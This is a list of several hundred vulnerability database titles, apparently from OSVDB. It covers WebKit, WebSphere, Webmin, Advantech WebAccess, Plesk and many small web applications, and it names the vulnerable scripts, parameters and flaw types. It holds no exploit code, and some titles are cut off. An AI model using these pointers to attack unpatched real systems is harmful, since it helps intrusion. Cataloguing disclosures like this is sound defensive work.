[81106] Cisco WebEx Player Unspecified WRF File Handling Remote Overflow
[81105] Cisco WebEx Player atas32.dll Content Decompression WRF File Handling Remote Overflow
[81104] Cisco WebEx Player atdl2006.dll Content Decompression WRF File Handling Remote Overflow
[81099] Goahead-Webserver Multiple Unspecified Issues
[81085] Wicd Daemon DBus Interface Configuration Property Setting Local Privilege Escalation
[81064] ISPConfig webdav_user_edit.php Path Verification File Permission Modification
[81042] WebKit JavaScript Bindings Parenting Pop-up Window Cross-Origin Violation
[81041] WebKit Source Element Evaluation DOM Modification Handling Use-after-free Issue
[81037] WebKit Cross-Origin iframe Replacement Same Origin Policy Bypass
[81012] MinaliC src/response.c Multiple Function Web Request Parsing Remote Overflow
[80945] Advanced POWER Web Hosting update_general_set.php Setting Manipulation CSRF
[80942] Charles River Web CMS search.php term Parameter XSS
[80940] Pyme-Web pw/seccion_administrable.php seccion_id Parameter SQL Injection
[80926] FastWeb2 fw2_landpage.php category_id Parameter XSS
[80925] FastWeb2 cat_prod.php category_id Parameter XSS
[80871] IBM Tivoli Directory Server Web Admin Tool Unspecified XSS
[80835] Google Android WebKit Unspecified Remote Code Execution
[80813] WebcamXP / Webcam7 URI Traversal Arbitrary File Access
[80792] WebMatter CMS lista_productos.asp id_cat Parameter SQL Injection
[80791] WebMatter CMS subcategoria.asp id_subcat Parameter SQL Injection
[80761] TYPO3 Command Line Interface CLI Script Direct Request Database Name Information Disclosure
[80758] AtMail Open @Mail WebMail Client install/info.php Direct Request Configuration Information Disclosure
[80757] AtMail Open @Mail WebMail Client CRLF Injection mime.php file Parameter Traversal Arbitrary File Access
[80756] AtMail Open @Mail WebMail Client libs/Atmail/SendMsg.php Attachment[] Parameter Traversal Arbitrary File Access
[80755] AtMail Open @Mail WebMail Client compose.php Multiple Parameter Traversal Arbitrary File Access
[80754] AtMail Open @Mail WebMail Client Email Attachment File Handling Remote Code Execution
[80742] WebKit SVGImageBufferTools::clipToImageBuffer Function SVG Clipping Use-after-free Issue
[80738] WebKit Text Fragment Handling Out-of-bounds Read Issue
[80737] WebKit SVG Text Drawing Out-of-bounds Read Issue
[80690] WebPortal CMS wp/FCKeditor/editor/filemanager/browser/default/browser.html Arbitrary File Upload
[80640] SAP Business Objects InfoView System /webi/webi_modify.aspx id Parameter XSS
[80625] Vitalogy Web CMS company.php id_cat Parameter SQL Injection
[80563] WebPAM usr_t.jsp userID Parameter HTTP Response Splitting
[80562] WebPAM usr_ent.jsp userID Parameter HTTP Response Splitting
[80561] WebPAM ent_i.jsp Multiple Parameter XSS
[80560] WebPAM ent_i.jsp Multiple Parameter SQL Injection
[80546] Cyberoam UTM /corporate/webpages/identity/ActiveDirectoryEdit.jsp Stored Credentials Remote Disclosure
[80528] PHP Web Server Malformed Content-Length Header Handling Remote DoS
[80482] Dr.Web Malformed CAB File Handling Scan Bypass
[80432] Dr.Web Malformed ELF File Handling Scan Bypass
[80373] Web Auction Output Cache Unspecified Cross-user Session Access
[80370] LG-Nortel ELO GS24M Configuration Web Page Direct Request Authentication Bypass
[80346] Webgrind index.php file Parameter Traversal Arbitrary File Access
[80344] WebGlimpse webglimpse.cgi query Parameter Shell Metacharacter Arbitrary Command Execution
[80334] Janetter Twitter Web Sites Unspecified Remote Session Disclosure
[80333] WebGlimpse Calculated Cookie Admin Authentication Weakness
[80332] WebGlimpse wgarcmin.cgi DOC Parameter Traversal Arbitrary File Access
[80331] WebGlimpse wgarcmin.cgi DOC Parameter XSS
[80330] WebGlimpse wgarcmin.cgi Crafted Request Path Disclosure
[80314] WebCalendar XSS Multiple Script URI XSS
[80295] Google Chrome Extension WebRequest API Extension Blacklist Request Interception Weakness
[80294] WebKit Magic iframe Same Origin Policy Bypass
[80292] Google Chrome Webui Privilege Isolation Weakness
[80291] WebKit RenderBlock::splitBlocks Function Block Splitting Use-after-free Issue
[80290] Google Chrome WebGraphicsContext3DCommandBufferImpl::FlipVertically Function Memory Corruption
[80289] WebKit CSSCrossfadeValue::crossfadeChanged Function CSS Cross-fade Handling Use-after-free Issue
[80288] WebKit RenderBlock::layoutInlineChildren Function :first-letter Pseudo-element Handling Use-after-free Issue
[80287] Metasploit Web UI project[name] Parameter XSS
[80285] Barracuda Web Application Firewall (WAF) 660 sessions_by_user filter Parameter XSS
[80264] Drupal Interface Localization XSS Weakness
[80218] Webfolio CMS webfolio/admin/users/edit/ Multiple Parameter XSS
[80213] LiteSpeed Web Server Admin Panel service/graph_html.php gtitle Parameter XSS
[80178] WebKit HTTP Authorization HTTP Header Logging Credential Disclosure
[80175] WebKit Third Party Cookie Blocking Weakness
[80160] General Electric (GE) Proficy Real-Time Information Portal Remote Interface Service (rifsrvd.exe) Traversal Configuration File Overwrite
[80144] McAfee Email and Web Security Appliance / Email Gateway Management Console Admin Password Session Token Persistence
[80143] McAfee Email and Web Security Appliance / Email Gateway Unspecified File Disclosure
[80142] McAfee Email and Web Security Appliance / Email Gateway Unspecified Traversal Arbitrary File Access
[80141] McAfee Email and Web Security Appliance / Email Gateway System Backup Hashed Passwords Disclosure
[80140] McAfee Email and Web Security Appliance / Email Gateway Dashboard Active Session Token Disclosure
[80139] McAfee Email and Web Security Appliance / Email Gateway Arbitrary Admin Password Resetting Weakness
[80138] McAfee Email and Web Security Appliance / Email Gateway Unspecified XSS
[80120] VMware vCenter Orchestrator Web Configuration Tool vCenter Server Password Disclosure
[80097] WebCalendar install/index.php User Theme Preference Save settings.php Overwrite
[80078] IBM Tivoli Endpoint Manager webreports ScheduleParam Parameter XSS
[80077] Aurora WebOPAC MemberDetailsRecovery.aspx txtEmailAliasBarcode Parameter SQL Injection
[80037] EJBCA ejbca/publicweb/webdist/certdist issuer Parameter XSS
[79981] TIBCO Multiple ActiveMatrix Products Unspecified Website Handling Information Disclosure
[79979] TIBCO Spotfire Multiple Products Unspecified Website Handling Remote Information Disclosure
[79975] WebKit Unspecified Drag and Drop Actions XSS
[79968] WebKit Unspecified XSS (2012-0589)
[79967] WebKit Unspecified XSS (2012-0588)
[79966] WebKit Unspecified XSS (2012-0587)
[79965] WebKit Unspecified XSS (2012-0586)
[79963] WebKit 'AbstractState::execute' Function Memory Corruption
[79962] WebKit Unspecified Memory Corruption (2012-0639)
[79961] WebKit Unspecified Memory Corruption (2012-0638)
[79960] WebKit Unspecified Memory Corruption (2012-0637)
[79959] WebKit Unspecified Memory Corruption (2012-0636)
[79958] WebKit Unspecified Memory Corruption (2012-0634)
[79957] WebKit Custom Scrollbar Renderer Removed Use-after-free Issue
[79956] WebKit Unspecified Memory Corruption (2012-0635)
[79955] WebKit Unspecified Memory Corruption (2012-0633)
[79954] WebKit Unspecified Memory Corruption (2012-0632)
[79953] WebKit Unspecified Memory Corruption (2012-0631)
[79952] WebKit Unspecified Memory Corruption (2012-0630)
[79951] WebKit Unspecified Memory Corruption (2012-0629)
[79950] WebKit Unspecified Memory Corruption (2012-0628)
[79949] WebKit Unspecified Memory Corruption (2012-0627)
[79948] WebKit Website Handling Unspecified Memory Corruption (2012-0626)
[79947] WebKit Unspecified Memory Corruption (2012-0625)
[79946] WebKit Unspecified Memory Corruption (2012-0624)
[79945] WebKit Unspecified Memory Corruption (2012-0623)
[79944] WebKit Unspecified Memory Corruption (2012-0622)
[79943] WebKit Unspecified Memory Corruption (2012-0621)
[79942] WebKit Unspecified Memory Corruption (2012-0620)
[79941] WebKit Unspecified Memory Corruption (2012-0619)
[79940] WebKit Unspecified Memory Corruption (2012-0618)
[79939] WebKit Unspecified Memory Corruption (2012-0617)
[79938] WebKit Unspecified Memory Corruption (2012-0616)
[79937] WebKit Unspecified Memory Corruption (2012-0615)
[79936] WebKit Unspecified Memory Corruption (2012-0614)
[79935] WebKit Website Handling Unspecified Memory Corruption (2012-0613)
[79934] WebKit Website Handling Unspecified Memory Corruption (2012-0612)
[79933] WebKit Website Handling Unspecified Memory Corruption (2012-0611)
[79932] WebKit Website Handling Unspecified Memory Corruption (2012-0610)
[79931] WebKit Website Handling Unspecified Memory Corruption (2012-0609)
[79930] WebKit Website Handling Unspecified Memory Corruption (2012-0608)
[79929] WebKit Website Handling Unspecified Memory Corruption (2012-0607)
[79928] WebKit Website Handling Unspecified Memory Corruption (2012-0606)
[79927] WebKit Website Handling Unspecified Memory Corruption (2012-0605)
[79926] WebKit Website Handling Unspecified Memory Corruption (2012-0604)
[79925] WebKit Website Handling Unspecified Memory Corruption (2012-0603)
[79924] WebKit Website Handling Unspecified Memory Corruption (2012-0601)
[79923] WebKit Website Handling Unspecified Memory Corruption (2012-0602)
[79922] WebKit Website Handling Unspecified Memory Corruption (2012-0600)
[79921] WebKit Website Handling Unspecified Memory Corruption (2012-0599)
[79920] WebKit Website Handling Unspecified Memory Corruption (2012-0598)
[79919] WebKit Website Handling Unspecified Memory Corruption (2012-0597)
[79918] WebKit Website Handling Unspecified Memory Corruption (2012-0596)
[79917] WebKit Website Handling Unspecified Memory Corruption (2012-0595)
[79916] WebKit Website Handling Unspecified Memory Corruption (2012-0594)
[79915] WebKit Website Handling Unspecified Memory Corruption (2012-0593)
[79913] WebKit Website Handling Unspecified Memory Corruption (2012-0591)
[79912] WebKit Container Node Handling Use-after-free Issue
[79911] WebKit Floats Removed Originating Line Handling Use-after-free Issue
[79910] WebKit Inline Box Wrapper Handling Use-after-free Issue
[79909] WebKit Media Content Handling Bad Cast Memory Corruption
[79908] WebKit SimplifiedBackwardsTextIterator first-letter Rule Incorrect Offset Returned Out-of-bounds Read Issue
[79906] WebKit 'RenderBlock::columnsBlockForSpanningElement' Function Use-after-free Issue
[79906] WebKit SVG Transform Animation Handling Memory Corruption
[79905] WebKit Selection selectstart Event Handling Root Removal Use-after-free Issue
[79893] WebKit Unspecified Universal XSS / History Navigation Remote Code Execution
[79879] NetDecision Traffic Grapher Server Web Request Parsing Traversal Arbitrary File Access
[79863] NetDecision NOCVision Server Web Request Parsing Traversal Arbitrary File Access
[79852] Webform Module for Drupal components/select.inc Multiple Vector XSS
[79824] XAVi X7968 webconfig/lan/lan_config.html/local_lan_config host_name_txtbox Parameter XSS
[79823] XAVi X7968 webconfig/wan/confirm.html/confirm pvcName Parameter XSS
[79820] OpenX Admin Interface sessionID Cookie SQL Injection
[79799] WebKit 'TextIterator::handleTextNodeFirstLetter' first-letter Selector Out-of-bounds Read Memory Disclosure
[79797] WebKit Line Box Cloning Multi-column Layout Handling Use-after-free Arbitrary Code Execution
[79796] WebKit RenderBlock::addChildToAnonymousColumnBlocks Anonymous Column Block Handling Bad Cast Memory Corruption
[79795] WebKit Line Box Handling Bad Cast Memory Corruption
[79787] WebKit CSS @font-face Rule List Management Use-after-free Remote Code Execution
[79779] Moodle Administration Command Line Interface IP Blocking Weakness
[79773] Moodle Security Key Web Service Token Disclosure
[79737] BlackBerry Multiple Product WebKit Website Handling Remote Code Execution
[79711] IBM WebSphere Application Server for z/OS WS-Security Enabled JAX-WS Applications Unspecified Issue
[79678] Cisco Wireless LAN Controllers (WLC) WebAuth HTTP/HTTPS Packet Parsing Remote DoS
[79676] Cisco Wireless LAN Controllers (WLC) Administrative Management Interface URL Parsing Remote DoS
[79674] WebCalendar Event Edit Page (edit_entry_handler.php) Multiple Parameter XSS
[79658] Webfolio CMS Admin User Creation CSRF
[79653] NetDecision Dashboard Server Non-Existent Resource Web Request Parsing Web Directory Path Disclosure
[79652] NetDecision Traffic Grapher Server Web Request GET Header Parsing NetDecision Script File Source Code Disclosure
[79651] NetDecision HTTP Server Web Request Parsing Remote Overflow
[79648] WebGlimpse wgarcmin.cgi Multiple Parameter XSS
[79611] Koyo ECOM100 Ethernet Module Web Server Authentication Weakness
[79608] Advantech/BroadWin WebAccess RPC Remote Code Execution
[79600] STHS v2 Web Portal team.php team Parameter SQL Injection
[79599] STHS v2 Web Portal prospect.php team Parameter SQL Injection
[79598] STHS v2 Web Portal prospects.php team Parameter SQL Injection
[79596] Zimbra Web Client zimbra/h/calendar view Parameter XSS
[79587] Advantech/Broadwin WebAccess bwocxrun.ocx Overflow Arbitrary File Creation Code Execution
[79586] Advantech/Broadwin WebAccess Arbitrary File Write Remote Code Execution
[79585] Advantech/Broadwin WebAccess Unspecified ActiveX Overflow
[79578] Advantech/Broadwin WebAccess GbScriptAddUp.asp Authentication Function Remote Code Execution
[79577] Advantech/Broadwin WebAccess uaddUpAdmin.asp Unauthorized Admin Password Manipulation
[79576] Advantech/Broadwin WebAccess Unspecified Overflow (2011-4524)
[79575] Advantech/Broadwin WebAccess opcImg.asp Remote Overflow
[79574] Advantech/Broadwin WebAccess Unauthorized Date/Time Syncing Modification
[79570] Advantech/Broadwin WebAccess Unspecified CSRF
[79569] Advantech/Broadwin WebAccess Unspecified Information Disclosure
[79568] Advantech/Broadwin WebAccess bwview.asp Unspecified XSS
[79567] Advantech/Broadwin WebAccess bwerrdn.asp Unspecified XSS
[79566] Advantech/Broadwin WebAccess Unspecified XSS
[79565] Advantech/Broadwin WebAccess Unspecified SQL Injection (2012-0244)
[79563] Advantech/Broadwin WebAccess Unspecified SQL Injection (2012-0234)
[79562] Advantech/Broadwin WebAccess Unspecified SQL Injection (2011-4521)
[79506] Cisco Small Business SRP520 / SRP540 Series Missing Authentication Check Web Request Parsing Configuration File Upload
[79460] Unity Web Player Unity 3D File Handling Remote Overflow
[79435] IBM WebSphere Lombardi Edition Coach Input Control XSS
[79432] SAP NetWeaver Adapter Monitor com.sap.aii.mdt.amt.web.AMTPageProcessor Servlet Adapter Monitor Information Disclosure
[79430] SAP NetWeaver Application Administration (com.sap.ipc.webapp.ipc) ipc/admin/log_view.jsp logfilename Parameter Traversal Arbitrary File Access
[79429] SAP NetWeaver Application Administration (com.sap.ipc.webapp.ipc) ipc/admin/log.jsp logfilename Parameter Traversal Arbitrary File Access
[79338] SecureSphere Web Application Firewall Violations Table username Field XSS
[79331] Web_Links Module for PHP-Nuke modules.php url Parameter SQL Injection
[79295] WebKit RenderInline::splitFlow Column Style Handling Memory Corruption
[79291] WebKit EventHandler::updateDragAndDrop Drag and Drop Use-after-free
[79289] WebKit SubframeLoader::loadSubframe Function Subframe Loading Use-after-free Issue
[79285] Google Chrome WebDatabase Worker Access Frame Closing Race Condition Use-after-free Issue
[79284] WebKit WebCore/rendering/RenderCounter.cpp Counter Nodes Handling Use-after-free
[79263] Microsoft SharePoint themeweb.aspx Unspecified XSS
[79047] Webmin Config File Cleartext Password Local Disclosure
[79046] Webmin URL NULL Byte Handling Unspecified Issue
[79045] Webmin /tmp Insecure File Permission Weakness
[79044] Webmin miniserv.pl Unspecified Local Password Disclosure
[79043] Webmin Multiple Unspecified Issues
[79042] Webmin Change Password Module Unauthorized Arbitrary Password Manipulation
[79041] Webmin Samba Windows File Sharing Module /tmp/.webmin Local Password Disclosure
[79039] Webmin chooser.cgi Unspecified XSS
[79038] Webmin Process Listing MySQL Password Local Disclosure
[79009] RabidHamster R4 miniscreenshot Script Function Web Request Parsing Remote Overflow
[79008] RabidHamster R4 Boundary Error Web Request Parsing Remote Overflow
[79007] RabidHamster R4 Log Entry Creation Web Request Parsing Remote Overflow
[78961] Siemens SIMATIC WinCC flexible HMI Web Server Unspecified XSS (2011-4511)
[78960] Siemens SIMATIC WinCC HMI Web Server Unspecified XSS (2011-4510)
[78951] WebKit EventHandler::mouseMoved Function mousemove Event Handling Use-after-free Arbitrary Code Execution
[78949] WebKit FrameView::forceLayoutParentViewIfNeeded Function SVG Layout Handling Use-after-free Arbitrary Code Execution
[78948] WebKit Document::styleSelectorChanged Function CSS Handling Use-after-free Arbitrary Code Execution
[78946] WebKit XSLTProcessor::transformToString Stylesheet Error Handling Use-after-free
[78938] WebKit Column Span Handling Bad Cast Memory Corruption
[78935] WebKit Aborted IndexedDB Transaction Handling Use-after-free Arbitrary Code Execution
[78931] CA Total Defense Suite UNC Management Web Service App_Code.dll Domain Credentials Disclosure
[78890] XWiki Enterprise xwiki/bin/commentadd/Main/WebHome XWiki.XWikiComments_comment Parameter XSS
[78850] Juniper Junos J-Web Component Unspecified CSRF
[78835] WebsiteBaker wb/account/forgot.php HTTP-Referer XSS
[78834] WebsiteBaker wb/search/index.php HTTP-Referer XSS
[78822] Sphinx Mobile Web Server Blog/AboutSomething.txt comment Parameter XSS
[78821] Sphinx Mobile Web Server Blog/MyFirstBlog.txt comment Parameter XSS
[78815] Apple Mac OS X WebDAV Sharing Component User Authentication Handling Local Privilege Escalation
[78808] Apple Mac OS X Internet Sharing Component Wi-Fi Configuration Reset WEP Password Removal
[78804] Apple Mac OS X CFNetwork Component Web Page URL Handling Remote Information Disclosure
[78792] Webservices Extension for TYPO3 Unspecified Remote Code Execution
[78775] JBoss Web Surrogate Pair Character Handling Infinite Loop Remote DoS
[78731] OpenEMR interface/fax/fax_dispatch.php file Parameter exec() Call Arbitrary Shell Command Execution
[78729] OpenEMR interface/patient_file/encounter/view_form.php formname Parameter Traversal Local File Inclusion
[78728] OpenEMR interface/patient_file/encounter/trend_form.php formname Parameter Traversal Local File Inclusion
[78727] OpenEMR interface/patient_file/encounter/load_form.php formname Parameter Traversal Local File Inclusion
[78716] Atlassian FishEye / Crucible Webwork 2 Unspecified XSS
[78704] JBoss Enterprise Web Server mod_cluster Virtual Host Registration Access Restriction Bypass
[78690] WebTitan Add URL Module Unspecified XSS
[78689] WebTitan Categories Add/Edit Module Unspecified XSS
[78688] WebTitan Setup Time Module Unspecified XSS
[78687] WebTitan Extensions / Execute Files Module Unspecified XSS
[78655] ktsuss GTK Interface Subprocess GTK_Modules Variable Local Privilege Escalation
[78652] Ada Web Server Hash Collision Form Parameter Parsing Remote DoS
[78601] IBM WebSphere Application Server (WAS) Default Messaging Component SibRaRecoverableSiXaResource Class FFDC Log File Local Information Disclosure
[78575] IBM WebSphere Application Server (WAS) IVT Install Component Unspecified XSS
[78554] RSA enVision Environment Variable Web System Setup Information Disclosure
[78547] WebKit contextElementForInsertion Function Adjacent HTML Insertion Memory Corruption
[78546] WebKit Convex Path Handling Uninitialized Value Arbitrary Code Execution
[78545] WebKit 'Document::importNode' Function Element Import Handling Use-after-free Issue
[78544] WebKit DOMSelection::addRange Function Range Selection Handling Use-after-free Arbitrary Code Execution
[78531] NX Web Companion nxapplet.jar Multiple Parameter Update Handling File Upload Remote Code Execution
[78525] Stoneware webNetwork 6 Unspecified SQL Injection
[78524] Stoneware webNetwork 6 News Articles Page Multiple Field XSS
[78523] Stoneware webNetwork 6 TeamPages Page Multiple Field XSS
[78522] Stoneware webNetwork 6 My Blog Page Multiple Field XSS
[78521] Stoneware webNetwork 6 Authentication Hijacking CSRF
[78502] AllWebMenus Plugin for WordPress wp-content/plugins/allwebmenus-wordpress-menu-plugin/actions.php File Upload Remote PHP Code Execution
[78497] Koyo ECOM100 Ethernet Module Web Server Unspecified Resource Exhaustion Remote DoS
[78496] Koyo ECOM100 Ethernet Module Web Server Unspecified Overflow
[78474] Horde Groupware Webmail Edition Horde_Form Email Verification XSS
[78467] WebTitan NTP Server (Display) Module Unspecified XSS
[78454] OpenNMS web/springframework/security/SecurityAuthenticationEventOnmsEventBuilder.java Username Field XSS
[78430] Oracle Fusion Middleware Web Services Manager Security Component Unspecified Remote Information Disclosure
[78429] Oracle Fusion Middleware Web Services Manager Security Component Unspecified Remote Issue
[78428] Oracle Fusion Middleware Web Services Manager Security Component Unspecified Remote DoS
[78417] Oracle GlassFish Enterprise Server Web Container Component Unspecified Remote DoS
[78405] Oracle Fusion Middleware WebCenter Content Component idc/help/user_help/wwhelp/wwhimpl/common/html/frameset.htm URI XSS
[78404] Oracle Fusion Middleware WebCenter Content Component idc/idcplg Multiple Parameter XSS
[78403] Oracle Fusion Middleware WebCenter Content Component idc/idcplg Multiple Parameter SQL Injection
[78400] Oracle BEA WebLogic Server Web Container Component Unspecified Remote DoS
[78332] IBM WebSphere Application Server (WAS) iscdeploy Script Insecure Permissions Multiple Directory Local File Manipulation
[78321] IBM WebSphere Application Server (WAS) Hash Collision Form Parameter Parsing Remote DoS
[78319] PHP Ringtone Website ringtones.php getparam() Function Multiple Parameter XSS
[78311] NeoAxis Web Player neoaxis_web_application_win32.zip File Handling Traversal Arbitrary File Overwrite
[78291] IBM WebSphere Application Server (WAS) for z/OS Web Messaging Component Unspecified XSS
[78290] IBM WebSphere Application Server (WAS) for z/OS (JAX-WS) WS-Security Policy Unspecified Remote Issue
[78287] Siemens Tecnomatix FactoryLink WebClient ActiveX Control Location URL Parameter Parsing Remote Code Execution
[78284] IBM Web Experience Factory (WEF) Smart Refresh Dojo Multiple Element XSS
[78279] 3S CoDeSys Control Service CmbWebserver.dll Module HTTP Get Request Parsing Arbitrary Directory Creation
[78273] GreenBrowser Find keyword Functionality Website iframe Handling Double-free Remote Code Execution
[78224] HP LaserJet P3015 Embedded Web Server Traversal Arbitrary File Access
[78218] MangosWeb Enhanced mangos/index.php login Parameter SQL Injection
[78214] IBM WebSphere Application Server (WAS) Community Edition Tomcat Container Multiple Parameter Request Parsing Remote DoS
[78185] Lingotek Module for Drupal Page Content Manipulation Webform XSS
[78181] Fill PDF Module for Drupal fillpdf.module fillpdf_merge_pdf() Function Web Request Parsing Access Restriction Bypass
[78149] WebKit Animation Frame Handling Use-after-free Arbitrary Code Execution
[78146] AtMail Webmail Client index.php/mail/calendar/caldavglue Title Parameter XSS
[78126] BigACE Web CMS system/application/search/search.php language Parameter XSS
[78125] BigACE Web CMS system/application/auth/password.php username Parameter XSS
[78124] BigACE Web CMS system/application/auth/login.php Multiple Parameter XSS
[78079] GoAhead WebServer Partial HTTP Request Parsing Remote DoS
[78069] Akiva WebBoard /WB/Default.asp name Parameter SQL Injection Authentication Bypass
[78057] Microsoft .NET Framework ASP.NET Hash Collision Web Form Post Parsing Remote DoS
[78035] Splunk Web API Traversal Arbitrary File Access
[78001] Websense Multiple Product explorer_wse/ws_irpt.exe Request Parsing Remote Shell Command Execution
[77998] cApexWEB capexweb/servlet/capexweb.parentvalidatepassword Multiple Parameter SQL Injection
[77983] phpMyAdmin Setup Interface $host Parameter XSS
[77943] WebSVN revision.php path Parameter XSS
[77942] WebSVN comp.php path Parameter XSS
[77941] WebSVN websvn/diff.php path Parameter XSS
[77903] Parallels Plesk Panel Control Panel Multiple Script Cross-Domain Referer Leakage Multiple Web-Server Log Information Disclosure (2011-4852)
[77868] Parallels Plesk Small Business Panel Multiple Script Cross-Domain Referer Leakage Multiple Web-Server Log Information Disclosure
[77860] Parallels Plesk Small Business Panel /smb/web/view/id/1/ user Cookie SQL Injection
[77827] Parallels Plesk Panel Control Panel Multiple Script Cross-Domain Referer Leakage Multiple Web-Server Log Information Disclosure (2011-4740)
[77813] Parallels Plesk Panel Control Panel /smb/web/view/id/1/<
[77812] Parallels Plesk Panel Control Panel /smb/web/<
[77785] SmarterTools SmarterStats frmGettingStarted.aspx Cross-Domain Referer Leakage Multiple Web-Server Log Information Disclosure
[77774] Web File Browser webFileBrowser.php file Parameter Traversal Arbitrary File Access
[77746] Barracuda Web Filter Backup Test Component XSS
[77745] Barracuda Web Filter NTLM User Search Component XSS
[77744] Barracuda Web Filter Active Directory Component XSS
[77743] Barracuda Web Filter Local User Search Component XSS
[77742] Barracuda Web Filter Schedule Report Component XSS
[77725] libsocialweb services/twitter/twitter-*-view.c Twitter Service SSL Certificate Validation MitM Weakness
[77720] WebKit Mixed Direction Text Runs Handling Use-after-free Issue
[77715] WebKit dom/RangeBoundaryPoint.h Range Handling Use-after-free Arbitrary Code Execution
[77714] WebKit SVGResourcesCache::clientDestroyed Function SVG Filters Use-after-free Arbitrary Code Execution
[77711] WebKit CSSParser::addProperty Function CSS Property Array Length Handling Buffer Overflow
[77710] WebKit parseArcFlag Function SVG Parsing Out-of-bounds Read DoS Weakness
[77684] Linux Kernel OMAP4 Bridge Networking Interface Network Packet Parsing Remote DoS
[77665] Microsoft Time ActiveX (DATIME.DLL) Unspecified IE Web Page Handling Remote Code Execution
[77645] Oxide WebServer Traversal Arbitrary File Access
[77618] WebKit Cache Objects Image Handling Browsing History Disclosure
[77616] Opera Web Workers Unspecified Remote DoS
[77611] phpWebSite Unspecified XSS
[77533] BRS WebWeaver Error Page XSS
[77532] Xeneo Web Server Malformed URL Encoded Character Request Parsing Remote DoS
[77502] Moodle user/action_redir Messaging Interface Username Disclosure
[77500] Moodle Web Services Login Authentication Bypass
[77489] Webistry index.php pid Parameter SQL Injection
[77444] Apache HTTP Server mod_proxy Module Web Request HTTP/0.9 Protocol URL Parsing Proxy Remote Security Bypass
[77426] Webform Validation Module for Drupal Multiple Unspecified XSS
[77402] IBM Tivoli Netcool/Reporter CGI Web Request Parsing Remote Shell Command Execution
[77389] 3S CoDeSys CmpWebServer NULL Pointer Invalid HTTP Request Parsing Remote DoS
[77388] 3S CoDeSys CmpWebServer HTTP POST Request NULL Pointer Content-Length Parsing Remote DoS
[77387] 3S CoDeSys CmpWebServer 0040f480 Function URI Copying Remote Overflow
[77384] Siemens SIMATIC WinCC Flexible miniweb HTTP Post Request Parsing Invalid Memory Read Remote DoS
[77383] Siemens SIMATIC WinCC Flexible miniweb.exe Traversal Arbitrary File Access
[77379] Schneider Electric Multiple Products Web Portal Unspecified Traversal Arbitrary File Access
[77293] Linux Kernel b43 Driver Wireless Interface Frame Parsing Remote DoS
[77242] Zenprise Device Manager Web Console Command Execution CSRF
[77206] Apple WebObjects Unspecified XSS
[77198] GoAhead WebServer goform/formTest Multiple Parameter XSS
[77197] webERP phpinfo.php Direct Request Remote Information Disclosure
[77196] webERP reportwriter/FormMaker.php ReportID Parameter SQL Injection
[77195] webERP reportwriter/ReportMaker.php reportid Parameter SQL Injection
[77194] webERP Multiple Script URI XSS
[77179] InduSoft Web Studio Remote Agent Component CEServer.exe Request Authentication Weakness DLL Loading Remote Code Execution
[77178] InduSoft Web Studio Remote Agent Component CEServer.exe Remove File Operation Remote Overflow
[77174] IBM WebSphere MQ Control Command Local Access Restriction Bypass
[77162] FreeWebshop.org ajax_save_name.php Remote Code Execution
[77135] Atlassian Confluence Direct Web Remoting (DWR) Debug Mode AJAX Request Handler Information Disclosure
[77091] Zingiri Web Shop Plugin for WordPress /tiny_mce/plugins/ajaxfilemanager/ajax_file_cut.php selectedDoc[] Parameter Remote PHP Code Execution
[77071] Atlassian Confluence Seraph Web Framework HTTP Header Injection
[77059] Atlassian Confluence WebDAV Configuration Page XSS
[77047] Roundcube Webmail include/iniset.php Subject Header Parsing Remote DoS
[77037] WebKit swapInNodePreservingAttributesAndChildren Function Use-after-free Arbitrary Code Execution
[76973] Wiki Web Help handlers/getpage.php id Parameter SQL Injection
[76971] webmaster-tips.net Flash Gallery (com_wmtpic) Component for Joomla! index.php Itemid Parameter SQL Injection
[76970] IBM WebSphere MQ Stopped Queue Manager Connection Saturation Remote DoS
[76965] Webform CiviCRM Integration Module for Drupal Unspecified SQL Injection
[76958] PHP Labware Multiple Product Multiple stocks/interface_creator/index_long.php where_clause Parameter SQL Injection
[76957] PHP Labware Multiple Product Multiple stocks/interface_creator/index_short.php where_clause Parameter SQL Injection
[76956] PHP Labware Multiple Product Multiple stocks/interface_creator/index.php where_clause Parameter SQL Injection
[76954] Mozilla Multiple Products WebGL GPU Memory Random Image Disclosure
[76940] icedtea-web Web Browser Plugin Applet Handling Same Origin Policy Bypass
[76906] CmyDocument myWebDoclist.asp x_Revised Parameter SQL Injection
[76875] Serv-U Web Client Unspecified XSS
[76874] IBM WebSphere MQ SSL Information Client Channel Definition Table (CCDT) File Handling Local Overflow
[76873] IBM WebSphere MQ Long Group Name Parsing Local Privilege Escalation
[76872] IBM WebSphere Application Server (WAS) Administration Console Unspecified XSS (2009-2748)
[76860] IBM WebSphere Application Server (WAS) JavaServer Faces (JSF) Request Parsing Unspecified Remote File Disclosure
[76847] GoAhead Webserver adduser.asp Multiple Parameter XSS
[76846] GoAhead Webserver addlimit.asp url Parameter XSS
[76845] GoAhead Webserver addgroup.asp group Parameter XSS
[76824] Kent Web Forum Unspecified XSS (2011-4172)
[76819] Cisco Adaptive Security Appliances (ASA) 5500 Series Interface Description Non-ASCII Character Parsing Local DoS
[76812] Cisco TelePresence Video Communication Servers (VCS) Login Page Admin Interface User-Agent HTTP Header XSS
[76804] Android Multiple HTC Devices Sense Interface HtcLoggers.apk Application android.permission.INTERNET Weakness Remote Information Disclosure
[76789] Spacewalk web/modules/pxt/PXT/Handlers.pm Self Referencing Link XSS
[76774] HP OpenView Network Node Manager webappmon.exe CGI Remote Overflow
[76767] General Electric (GE) Proficy Historian Web Administrator Component Unspecified XSS
[76675] Check Point UTM-1 Edge / Safe@Office WebUI /pub/test.html url Parameter Information Disclosure
[76653] Alcatel-Lucent OmniTouch 8400 Instant Communication Suite /websoftphone/servlet/DispLogon Multiple Parameter XSS
[76652] Alcatel-Lucent OmniTouch 8400 Instant Communication Suite websoftphone/jsp/RTCNavigator.jsp sessionid Parameter XSS
[76651] Alcatel-Lucent OmniTouch 8400 Instant Communication Suite websoftphone/jsp/CustoData.jsp openwin Parameter XSS
[76650] Alcatel-Lucent OmniTouch 8400 Instant Communication Suite /websoftphone/jsp/PhoneBookCont.jsp udatab Parameter XSS
[76649] Alcatel-Lucent OmniTouch 8400 Instant Communication Suite websoftphone/jsp/CBCallBackCont.jsp list Parameter XSS
[76648] Toshiba TEC E-Studio Multifunction Printers Management Interface /TopAccess/ / Appending Access Restriction Bypass
[76637] Trend Micro InterScan Web Security Suite setuid/setgid root /opt/trend/iwss/data/patch/bin/patchCmd Multiple Script Local Privilege Escalation
[76619] WebsiteBaker /admin/media/upload.php Arbitrary File Upload
[76618] WebsiteBaker /admin/users/add.php Admin Addition CSRF
[76606] KaiBB inc/function.php attachment Parameter Webform File Upload SQL Injection
[76602] Splunk Web Component prototype/segmentation_performance segment Parameter XSS
